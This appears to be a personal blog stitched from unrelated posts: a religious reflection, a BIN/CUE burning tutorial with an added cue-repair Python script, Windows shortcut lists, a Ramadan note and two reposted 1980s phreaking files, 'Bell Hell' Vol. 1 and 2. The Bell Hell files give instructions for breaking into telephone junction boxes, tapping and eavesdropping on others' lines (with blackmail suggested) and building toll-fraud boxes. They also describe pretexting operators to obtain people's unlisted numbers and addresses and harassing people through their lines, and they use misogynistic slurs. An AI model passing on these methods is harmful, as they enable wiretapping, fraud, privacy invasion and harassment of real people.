Well, today I'm going to give an update on the contents of a book I happened to read today.
Getting straight to it, the words of wisdom I took in today are: "the more wealth one has, the longer one's reckoning in the hereafter; the less wealth, the quicker one is judged in the hereafter and the quicker one enters paradise, provided one is among those who are saved".
This does not mean I am urging us Muslims to be destitute; rather, I am urging Muslims to become millionaires, whose abundant wealth is then used for good things (including what is obligatory, namely zakat, as well as other deeds that add weight to the scale of good deeds, such as giving charity, feeding the poor and needy, helping people who need money, and so on).
The point is... do not be lulled by the possessions you own in this world, because all of it will be the responsibility of its owner and will be reckoned on the Day of Judgment. Nor will we take our wealth with us after we die...
Those are my thoughts for today; I hope they are useful and can lead both me and all readers to become better people... amen.
Tuesday, September 20, 2011
Tuesday, August 16, 2011
Fasting
shiyam = fasting = imsak = restraint = patience
patience is a lamp
prayer (shalat) is light
patience is the key to happiness
patience and prayer are the helpers of those who believe
Allah is with those who are patient
Labels:
in mind
BIN & .CUE simple
BIN & .CUE simple tutorial.
There always seems to be the question "what do I do with a .bin and .cue file" in these forums so I figured I would write a quick and simple tutorial. Please feel free to add more.
So you have downloaded two files, one with a .bin extension and one with a .cue extension. "What do I do with these?" you ask. There are a number of options.
BURN TO CD
You will need either NERO, CDRWIN or FIREBURNER to burn the file.
To burn with NERO:
Start NERO, choose FILE, choose BURN IMAGE, locate the .cue file you have and double click it. A dialog box will come up; for anything other than music, make sure you choose DISC-AT-ONCE (DAO). You can also turn off the simulation burn if you so choose.
Then burn away.
To burn with CDRWin:
Start CDRWin, choose the button on the top left, choose LOAD CUESHEET, press START RECORDING.
To burn with Fireburner:
Start Fireburner, click on the button on the bottom left corner "VISUAL CUE BURNER/BINCHUNKER", press the right mouse button and choose LOAD TRACKS FROM .CUE and choose the correct .CUE file, press the right mouse button again and select "Burn/Test Burn", choose DISK AT ONCE (DAO), disable TEST BURN and MULTISESSION, press OK.
.CUE ERRORS
The most common error you will get with a .cue file is when it points to an incorrect path. This is easily fixed. Find the .bin file, copy the exact title including the .bin extension. Now find the .cue file, open the .cue file using notepad. It should look similar to this:
FILE "name of file.bin" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 00 00:04:00
INDEX 01 00:06:00
Delete everything in the quotes; in this case we would delete name of file.bin. Now place the title you copied in between the quotes. Save the changes and close out.
That's it, your .cue file should work now.
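The same repair done with a script, as an added example that is not part of the original tutorial: it finds the FILE line, reports why it will fail, and rewrites only the text between the quotes. It goes one step beyond the tutorial by also flagging FILE entries that carry a drive letter or folder path, since a cue sheet should only name a file sitting next to it. The function names, the sample cue sheet and the file name "game image.bin" are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path, PureWindowsPath

# FILE "name of file.bin" BINARY   (quoted)   or   FILE name.bin BINARY   (bare)
FILE_RE = re.compile(r'^(\s*FILE\s+)(?:"([^"]*)"|(\S+))(\s+\S+\s*)$', re.IGNORECASE)

# Constructed sample: a cue sheet whose FILE line still holds the path
# from the machine it was created on.
SAMPLE_CUE = "\n".join([
    r'FILE "C:\Downloads\old name.bin" BINARY',
    "  TRACK 01 MODE2/2352",
    "    INDEX 01 00:00:00",
    "  TRACK 02 MODE2/2352",
    "    INDEX 00 00:04:00",
    "    INDEX 01 00:06:00",
]) + "\n"


def referenced_name(line):
    """Return the file name a FILE line points at, or None for other lines."""
    m = FILE_RE.match(line)
    if m is None:
        return None
    return m.group(2) if m.group(2) is not None else m.group(3)


def audit_cue(cue_text, cue_dir):
    """List (line number, name, problem) for every FILE line that will not load."""
    problems = []
    for lineno, line in enumerate(cue_text.splitlines(), 1):
        name = referenced_name(line)
        if name is None:
            continue
        # PureWindowsPath understands both \ and / separators on any OS.
        parsed = PureWindowsPath(name)
        if parsed.is_absolute() or parsed.drive or len(parsed.parts) != 1:
            problems.append((lineno, name, "path leaves the .cue folder"))
        elif not (Path(cue_dir) / name).is_file():
            problems.append((lineno, name, "no such file next to the .cue"))
    return problems


def repair_cue(cue_text, bin_name):
    """Replace what is between the quotes with the bare .bin file name."""
    if not bin_name or '"' in bin_name or PureWindowsPath(bin_name).name != bin_name:
        raise ValueError("bin_name must be a bare file name, without any folder")
    lines = cue_text.splitlines()
    hits = [i for i, line in enumerate(lines) if FILE_RE.match(line)]
    if len(hits) != 1:
        # Multi-file cue sheets need a name per FILE line; do not guess.
        raise ValueError("expected exactly one FILE line, found %d" % len(hits))
    m = FILE_RE.match(lines[hits[0]])
    lines[hits[0]] = f'{m.group(1)}"{bin_name}"{m.group(4)}'
    return "\n".join(lines) + "\n"


def demo():
    """Audit the sample, repair it against a real file, and audit again."""
    with tempfile.TemporaryDirectory() as folder:
        (Path(folder) / "game image.bin").write_bytes(b"")  # stand-in .bin
        before = audit_cue(SAMPLE_CUE, folder)
        fixed = repair_cue(SAMPLE_CUE, "game image.bin")
        after = audit_cue(fixed, folder)
    return before, fixed, after


if __name__ == "__main__":
    before, fixed, after = demo()
    print("before:", before)
    print(fixed, end="")
    print("after:", after)
```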
OTHER WAYS TO USE .BIN & .CUE FILES
VCDGear:
This program will allow you to extract MPEG streams from CD images, convert VCD files to MPEG, correct MPEG errors, and more.
Daemon Tools:
This program creates a virtual drive on your PC which will allow you to "mount" the .cue file and use whatever is in the .bin file without having to burn it to a cd.
ISOBuster:
This program will allow you to "bust" open the .bin file and extract the files within the .bin.
_________________
Labels:
article
Friday, August 12, 2011
best keyboard shortcuts
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
[Ctrl] and Left, Right arrow Move cursor forward or back one word
[Ctrl] and Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
accessibility shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT five times....... Switch StickyKeys on and off.
NUM LOCK for five seconds...... Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK on numeric keypad (*)....... Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN on numeric keypad (+)....... Display the contents of the selected folder.
NUM LOCK+MINUS SIGN on numeric keypad (-)....... Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
Internet browser
Type a word such as "google" in the address bar, then press [Right CTRL] and [Enter]
to add www. and .com to the word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
Prevent the CD from automatically playing. SHIFT when you insert a CD into the CD-ROM drive
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key, you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
Labels:
article
Bell Hell Volume #2
Bell Hell Volume #2
By: The Dutchman
Neon Knights -Wired / Metal Communications
METAL! KICKS!
Thanx to: Baby Demon & The Metallian
Call These Genocidal Systems...
/\/\etalland 1 10mgs/AE/BBS/Cat-Fur [503]538-0761
/\/\etalland ][ AE/Cat-Fur Line..... [503]253-5300
The /\/\etal AE PW: KILL............ [201]879-6668
The Cheese ][ 10mgs/AE/BBS/Cat-Fur [409]696-7983
Milliways 10mgs BBS........... [609]921-1994
7 Gates of Hell BBS................. [415]697-1320
The Mordor AE 1200bps/Cat-Fur/10mg [201]528-6467
/CONTENTS/
In vol. I we discussed some of the minor aspects of bell hell. Now we shall
enter the realm of serious bell hell, including how to crush AT&T's firm grip
on the wired industry and Ma's underground passages.
/MA'S CODES ETC./
In order to make things easier for her employees, Ma has given us not only
free access to almost all her treasures but guides next to them to help us
along the way. One of the more common boxes found are the ones located either
at the end of your street, in an adjacent field or on telephone poles. Any of
these boxes contains all the lines for the surrounding neighbourhood. Ma
usually supplies a code for the wires inside on the side of the door to one of
these boxes, if not the code usually goes like this:
Red (ring-) = Ring line, allows others to call you
Green (tip+) = Calling out line, for you to call others
Ma has conveniently located these, the red on the right and the green on the
left. If you run into one of these boxes and it's locked then you'll need to
purchase either a 1/2" crowbar or a 7/16" hex driver, preferably the
latter. In order to use the 7/16, simply give a 1/8" turn counter clockwise,
presto you are in. The crowbar is self explanatory I believe.
The other, and less likely to be found of the bell underground network is just
that, the underground network. To find one of these simply look for a manhole
cover with a bell in the middle instead of an S or whatever your sanitary
dept. might use. The aspects and entry of these will be discussed later in
this article, now to the boxes.
Now that you are in one of these boxes there is a rather interesting list of
prospects: connect a linesman's handset, connect a box, or eavesdrop,
to name a few. Here are some of the ways to do these.
Hell #1:
/LINESMANS HANDSET/
In order to make a linesman's handset (if not included within the newly found
box) you'll need a few things:
1 a phone (preferably a GTE flip fone or a slimline)
2 a splicing knife (any knife will do, the sharper the better)
3 a set of alligator clamps (if not already within the box)
Now take your knife and cut off all the wires and the modular jack (if one)
saving the red (ring-) and green (tip+) wires. Now attach the alligator clips,
one to the red and one to the green, and you're set. All you need do is attach
the alligator clips to the designated colors on the box (red - red/green -
green) and you have essentially become an extension of that line.
Hell #2:
/THE BLACK/BLUE BOX/
Finally a place where you can use that box of yours with minimal worries of
being caught (the only way would be to get caught red-handed). Ah yes, bell
hell at one of its finer points. Commonly it takes Ma about a month or so to
figure out the trip on this one.
If you are unfamiliar with boxes, the black box allows others to call you free
whereas the blue box allows you to use operator lines and even become one of
the bitches (become an operator). For more info I would suggest consulting
black/blue box plans.
Use the normal plans for a black/blue box and make the following
modifications:
Equipment:
(1) SPST SWITCH (found at your local Trash Shack)
(1) 10K OHM 1/2 WATT 10% RESISTOR (same as above)
SOME EXTRA WIRE (same as above above)
Now disconnect the green wire in the box and connect it to one of the two
poles on the SPST switch. Take a piece of your extra wire connect one end to
the other pole on your SPST switch and the other end to the
place the 10k ohm resistor between the
Connect it (the 10k ohm resistor) via wire to the two. The
should have a green wire going to it and the
and blue wire connected to it. Your finished product should look something
like this:
--/-/--
:S P S T:
-------
:: ::
-----GREEN WIRE--:: ::----
!
10K OHM
!
!
-----WHITE WIRE-----------\\
------BLUE WIRE-----------------
This is simply the basic wiring. If you decide to become one with advancement
you might try hooking up lights to go on when you're online or perhaps a
recorder, whatever you wish.
Hell #3
/EAVES-DROPPING/
There are many ways to accomplish this; seeing how I like to stick to
basics I will describe what I feel is the easiest by far. First you need to
make a linesman's handset as mentioned above if you haven't already. Now simply
disconnect the sending end (the end you talk through) and listen in. From here
you can accomplish several tasks. If you are into blackmail you can
hook up a tape recorder (if you want to do this you can leave me a msg. or
wait for another file later, it's rather a long task) or you may simply hold
the recorder to the listening end of the phone. To find out about the line
etc., you can do a couple of things: first you can dial your ANI (automatic
number identification) and find out the line you are on; after this, call
a local CN/A (described below) and run a check on whose line it is etc.
This can bring all kinds of hell for those not-so-trustworthy wives/husbands.
More Hell:
/OTHER TRICKS/
You can set up a conference call simply by dialing your conference operator
(0-700-456-1000) and setting it up, just do what she says. I suggest this
operator for her lines are superior to those of the bitchy PBX ones. Oh,
you'll also need to know that line's person, address etc. Just pull an ANI and
then a CN/A on it.
If you have an urge to get back at someone simply attach your linesman's
handset to the person's line (find their line as mentioned many times before)
and leave it off the hook. You can imagine just how long it could take Ma's
loyal employees to discover the problem. Possibly weeks if not a month.
Using the person's line to call computer systems that trace: this also goes
under the heading 'getting back at people', for the hassles you'll cause them
when the line is traced to them are numerous; bitchy Ma employees tend to be
irrational, spoiled children when it comes to busting people.
Bugging the operator - self explanatory.
RAISE HELL
/Insider/ - The rest of this doc is mainly explanations, a little hell and a
few other things I decided to throw in instead of making another Vol. Its
true purpose is to coincide with Vol. I, as well as take up space; the rest is
unknown.
-----------
800 EXTENDERS
-----------
Basically, 800 extenders are much like Save-Net or Am-Net going 800 instead of
local access numbers. With this one you can call anywhere in the U.S. for
free, of course you need the X digit code, but this is easily found. You use
these just like you would if you were using Save-Net, i.e. you would dial
1-800-XXX-XXXX, then enter in your X digit code and then the area code + the
number you wish to reach, i.e. 1800521167429125036358443, as you can see there
is an 800 number followed by a 4 digit code followed by a number wished to be
reached. Here's a few 800 extenders, there's many, many more:
=-=-=-=-=-=-=------------------------->
LOOP NUMBERS EXPLORED
Loop numbers simply connect two people together using two different numbers.
Thus these numbers always come in pairs, one being the higher one while the
other being the lower one. So if you were to use one, you would call one of
the pair and the other one would call the other one (you take the high road
I'll take the low road). Loop numbers are equal in quality to calling direct,
thus it would be the same quality as you would get calling your neighbour. If
you happened to call a loop number and no one was on the other end, one of
two things would happen: if you called the higher of the two you would hear
silence, if you dialed the lower you would get a 1000 hertz tone. Here's a list
of some loop numbers:
Area Code 212
XXX-9979 (HIGH)
XXX-9977 (LOW)
XXX= 690,534,569,432,868,255,228,677,982,466,926,220,586,524,283
XXX-9906 (HIGH)
XXX-9900 (LOW)
XXX= 529,352,439,388
Where you see XXX you enter the prefix desired, thus if you wanted area code
212, you could choose a prefix say 690, so one person would dial 690-9906 and
the other 690-9900.
In order to scan for loop numbers you'll need a friend to help. Loop numbers
run in pairs, the combination is 00XX and XX99. So what you need is for one
person to scan one end while the other scans the upper (using the same
prefix). The hang side has no tone while the other gives off a 1000hz tone.
To use a loop number in order to start a conference call simply have one
person get on the hangside while another calls the conferencing operator (PBX
operator will do). The person calling the operator (hopefully from a fortress
phone) should charge the call to the upper loop number (the one the other
person isn't on); when the operator calls to verify she'll get your friend,
who of course will accept all charges gladly.
=-=-=-=-=-=-=------------------------->
Customer name and address
(CN/A)
A CN/A operator is designated for the use of AT&T employees who need some
information on a certain person. Ex- A Bell cop got a person's name from a nark
or whatever, he needs more info about the person so he calls up the CN/A
operator and asks her for the person's whereabouts. Ma has been nice enough to
grant these operators the knowledge of a few more things (Ma's slip up), such
as their phone number. Thus we can call up one of these operators, say, 'Hi, my
name's Joe Rodrequiz and I'm from the Lake Oswego Bell customer service
department, I need the following info on a 'Jack Suchos'.' Then you become
really nice and ask if you can have that person's phone number so you don't
have to go over there. Since these operators are human, and are easily conned
and are very informed they'll give you just about whatever you need to know.
However you must be polite and businesslike. Following is a list of CN/A's,
to use it, find your area code and the CN/A operator's number will follow:
DUTCHMAN DIRECTORY
AREA CODE PHONE NUMBER
---------- ---------------
201 201-676-7070
202 301-384-9820
203 203-789-6815
204 204-949-0900
205 205-988-7000
206 206-382-8000
207 617-787-2750
208 303-399-4200
209 415-546-1341
212 518-471-8111
213 213-501-4144
214 214-948-5731
215 412-633-5600
216 614-464-2345
217 217-525-7000
218 402-345-0600
219 317-265-4834
301 301-534-1168
302 412-633-5600
303 303-399-4200
304 304-344-8041
305 912-784-9111
306 NONE....NONE
307 303-399-4200
308 402-345-0600
309 217-525-7000
312 312-796-9600
313 313-223-8690
314 314-726-7142
315 518-471-8111
316 816-275-2782
317 317-265-4834
318 318-227-1551
319 402-345-0600
401 617-787-2760
402 402-345-0600
403 403-425-2652
404 912-784-9111
405 405-236-6121
406 303-399-4200
408 415-546-1132
412 412-633-5600
413 617-787-2760
414 608-252-6932
415 415-546-1132
416 416-922-6686
417 314-726-7142
418 514-861-2635
419 614-464-2345
501 405-236-6121
502 502-583-2861
503 203-784-6815
504 504-245-5330
505 303-399-4200
506 506-657-3855
507 402-345-0600
509 206-382-8000
512 512-828-2501
513 714-464-2345
514 514-861-2635
515 402-345-0600
516 518-471-8111
517 313-223-8690
518 518-471-8000
519 416-922-6686
601 601-961-0877
602 303-399-4200
603 617-787-2750
604 604-432-2996
605 402-345-0600
606 502-583-2681
607 518-471-8111
608 608-252-6932
609 201-676-7070
612 402-345-0600
613 416-922-6686
614 614-464-2345
615 615-373-5791
616 313-223-8690
617 617-787-2750
618 217-525-7000
701 402-345-0600
702 415-546-1341
703 804-747-1411
704 912-784-9111
705 416-922-6686
707 415-546-1132
709 NONE....NONE
712 402-345-0600
713 713-820-4112
714 213-501-4144
715 608-252-6932
716 518-471-8111
717 412-633-5600
801 303-399-4200
802 617-787-2750
803 912-784-9111
804 804-747-1411
805 415-546-1341
806 512-828-2501
807 416-922-6686
808 212-334-4336
809 LIST BELOW
812 317-265-4834
813 813-223-9678
814 412-633-5600
815 217-525-7000
816 816-275-2782
817 214-948-5731
819 514-861-2635
901 615-373-5791
902 902-421-4110
903 NONE....NONE
904 912-784-9111
906 313-223-8690
907 NONE....NONE
912 912-784-9111
913 816-275-2782
914 518-471-8111
915 512-828-2501
916 415-546-1341
918 405-236-6121
919 912-784-9111
900+(DIAL-IT) NUMBERS: 212-334-3611
FOR BAHAMAS, BERMUDA, DOMINICAN REP, JAMAICA AND PUERTO RICO: 212-334-4336
Downloaded From P-80 Systems 304-744-2253
Bell Hell Volume #1
////////////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**////////////////////////////////////////
///// ** M \\\\\\
\\\\\ ** Bell Hell Volume #1 E //////
///// ** T \\\\\\
\\\\\ ************ By: The Dutchman A C //////
///// Neon**Knights -Wired L O \\\\\\
\\\\\ ** M //////
///// ** Thanx to: Baby Demon & The Metallian M \\\\\\
\\\\\ ** U //////
///// ** Call These Genocidal Systems... N \\\\\\
\\\\\ ** 0 I //////
///// ** /\/\etalland 1 10mgs/AE/BBS/Cat-Fur[503]538-0761 C \\\\\\
\\\\\ /\/\etalland ][ AE/Cat-Fur Line.....[503]253-5300 A //////
///// METAL! The /\/\etal AE PW: KILL./..........[201]879-6668 T \\\\\\
\\\\\ KICKS! The Cheese ][ 10mgs/AE/BBS/Cat-Fur[409]696-7983 I //////
///// Milliways 10mgs BBS...........[609]921-1994 O \\\\\\
\\\\\ 7 Gates of Hell BBS.................[415]697-1320 N //////
///// The Mordor AE 1200bps/Cat-Fur/10mg[201]528-6467 S \\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////////
/////////////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
PREFACE: In this issue we'll discuss the different types of operators, area
codes and special numbers. This edition is made to give you a basic
understanding of the wicked ways of MA. I hope it'll give you a good enough
background to do well. Look for Bell Hell vol. 2 for more info on hacking.
=-=-=-=-=
OPERATORS:
=-=-=-=-=
Here we'll go over in detail some of the most common operators.
TSPS OPERATOR:
Traffic (us) Service Position System Operator is the bitch you commonly hear
whenever you use a pay phone etc. To say the least she's a meat head. Her
responsibilities are as follows:
[1] Getting all billing information for Calling Cards and 3rd number calls.
[2] Making sure you get the right person on person-to-person calls.
[3] Making sure the fool on the other end will pay for your collect call (why
call collect?)
[4] Identifying calling numbers, or basically asking you,
'what number are you calling, please.' when the system fucks up.
Even though these operators are commonly ding-bats, you shouldn't screw with
them, for they are known to be quick with the tracer. She can even tell if you
are calling from a fortress phone. She has a portable all time ready tracer.
Beware of these deadly bitches.
INWARD OPERATORS:
This wench is basically an apprentice to the bitch above (TSPS) or commonly
the '0' operator. She will never question you as long as you are within her
dimension (service) area. She can only be reached by a mighty Blue Box
(discussed in up and coming tutorial) or another operator.
DIRECTORY ASSISTANCE OPERATORS:
(DOA?DAO?)
This is the operator you get when you call directory assistance (555-1212).
All she can do is either tell you a listed number or tell you if a number is
unlisted. Waste of time.
DEAF D.A.O.'S
This neat little operator is set up to help with directory assistance for deaf
people (who would they want to talk to?). She's reachable by dialing
800-855-1155. She talks to the deaf via Teletypewriters (terminals). If your
modem can transfer baudot (Oh those sweet Apple Cats can) then you can talk to
her. You might find her a lot more friendly, more talkative, and a lot easier to
manipulate a number out of. However, she does use abbreviations like GA for go
ahead (pretty tricky huh).
CN/A OPERATORS
Oh the sweet CN/A, god bless its soul. These operators, instead of giving you
information on a person's phone number, give you information on a phone
number's person (the person at 503-229-7600). However, if manipulated these
beauties can give you the number for an unlisted phone number (the number),
they have all kinds of access. This topic is discussed later in this tutorial.
INTERCEPT OPERATOR:
All places have their share of low lifes, well this is the scum, bottom of the
barrel of operators. She's the one you get when all the recordings are busy
(lower than a recording). In fact these dames can cause you more pains than a
recording. They only know a handful of English (around two sentences) and can
barely even say those. Even though they have no clue to what a trace is,
unless you know their native tongue, and then doubtfully, they're just a pain in
the butt to deal with.
OTHER OPERATORS:
Well we have - marine verify, mobile, route and rate, ship to shore,
conference and a few other specific ones. No real help to us now.
*NOTES: Most operators have their own little Directory Assistance. If any
operator is giving you probs ask to speak with his/her/its supervisor. This
will freak them out. In rare loveable cases you might find a nice operator
with a number like (503-123-4567). Whenever you find a 0 or 1 in the 4th
number slot then you know you need a Blue Box. It'll give you special access to
those hard to get wenches.
=-=-=-=-=-=-=-=
AREA CODES ETC.
=-=-=-=-=-=-=-=
HOW PHONE NUMBERS WORK:
Basically MA made our phone numbers quite simple. Here's how they work:
[A] The area code is what they call a three digit number plan area or NPA. This
means that an area code is just that, the code for an area.
[B] The rest of our number (ie. 666-7209) is divided into two segments. The
first being the Central Office number (666 would be N. Portland) and the
ending (7209) is the station number, or basically your assigned home number.
This complete combination (503-666-7209) is known as the destination code.
Here's how MA has developed the combo's:
[NPA] [TELEPHONE NUMBER]
X*Y XYY-YYYY
X = a number from 2-9
Y = a number from 0-9
* = either 0 or 1
Normally an area code may never cross a state's boundary, thus an area code
(NPA) may not be used for both New York and for Pennsylvania. However, as for
all other rules there are exceptions. Here they are.
SPECIAL AREA CODES:
(SACS)
510 - TWX (USA)
610 - TWX (CANADA)
700 - NEW SERVICE
710 - TWX (USA)
800 - WATTS LINES
810 - TWX (USA)
900 - DIAL-IT SERVICES
910 - TWX (USA)
The explanations of these are as follows:
TWX:
Telex II, as you can see above there are 5 TWX machines. They are all owned by
Western Union. Normally these babes may only be accessed by other TWX
machines, however, if you do not wish to go and purchase one you can access
them by use of the Easylink, by Western Union. For more on this I would
suggest reading The Bioc Agents, and Tucs article on 'Hacking Western Union's
Easylink.'
700:
This is a new service for employees of AT&T in which someone (one of the
special employees) can call his own 700 number (say 700-292-9876), enters
his/her code, and where he is staying and then hangs up. If there is any new
info on the case he is working on, the computer will call him back and tell
him all the latest updates.
800:
There are basically two types of Watts Lines, Inward Watts and Outward watts.
These are probably some of the nicest of the special area codes since they
allow you to call for free. Here's an explanation of the two:
INWARD WATTS:
Inward Wide Area Telecommunications Service is probably the one you're most
familiar with. MA has developed it so there are 6 different levels of Inwatts.
Level 6 being the whole U.S. (all 50 states) level 5 being all 48 continental
states etc. all the way down to 1, only one state. Usually a company will get
a level 6 and then a level 1 because although level 6 allows you to call
from anywhere in the U.S. it excludes the state where the call is terminated
at, so the company usually buys a level 1 for that state.
Interstate Inwatts are less common but still exist. These are the ones you can
only call from say one state. You can tell one quite easily for they all have
a 2 for the last central office number, or the 6th number (ie. 800-XY2-XXXX).
All companies that have an 800# must have at least two lines. This is because
if you call the first number (ie. 800-666-0190) and it rings busy the 800#
number will always go to another port to see if its busy. Inwatts customers
are billed by the hour instead of month like us.
OUTWARD WATTS:
Outwatts are just that, they're for making outward calls only. Large companies
commonly use Outwatts since they receive bulk discounts. Outwatt 800's are in
the form of:
800-*XX-XXXX
* may only be a 0 or 1 and can only be reached by way of box. The whole set,
*XX is the areas that are accessible by that company.
900:
This is a nation number used for taking polls and the like (How do you think
they know what shows on the tube are k00l). The number for this service is,
900-555-1212. This will tell what's up on the system. Beware, this MA trick
will cost you 50 cents a minute, and 35 cents there after (ever heard of MA
being cheap?).
=-=-=-=-=
CO CODES
=-=-=-=-=
These are the way the switching office knows where to route the call. The
following codes are reserved nationwide:
555 - directory assistance
950 - future use
958 - plant test
959 - plant test
976 - dial-it services (weather etc.)
950:
This includes all special service. Here's a list of a few:
1000 - SPC
1022 - MCI Execunet
1033 - US Telephone
1044 - Allnet
1088 - SBS Skyline
*NOTE: These beauts are free from fortresses.
958,959:
These consist of ANI, Ringback and some other MA tests.
976:
Check this one out. Simply dial 976-1000. A lot of BBSs around will probably
have a more complete listing of these services.
=-=-=-=-=
N11 CODES:
=-=-=-=-=
I'm not sure which of these are still in service. Basically MA wants to
dump these services, but a lot are still in use, it'll vary with your area.
011 - international dialing prefix
211 - coin refund operator
411 - directory assistance
611 - repair service
811 - business office
911 - EMERGENCY
Downloaded From P-80 Systems 304-744-2253
Saturday, August 6, 2011
day 6
today is the 6th day of Ramadan,
well... if you look at the picture on the side, you will see that the first through the 5th of August are partly covered by stars.
well.. those mark the days on which Mujib has fasted since the start of Ramadan. A star shows that Mujib "fasted" for the whole day. At the very least Mujib joined the pre-dawn meal and the breaking of the fast... I myself don't know whether he really went without food & drink all day.
well... the stars are a reward, which was mbak Iis's idea. If Mujib fasts for one full day he gets a star for that day; if he doesn't fast the full day, that is, he is caught eating/drinking, well.. he doesn't get a star, of course.
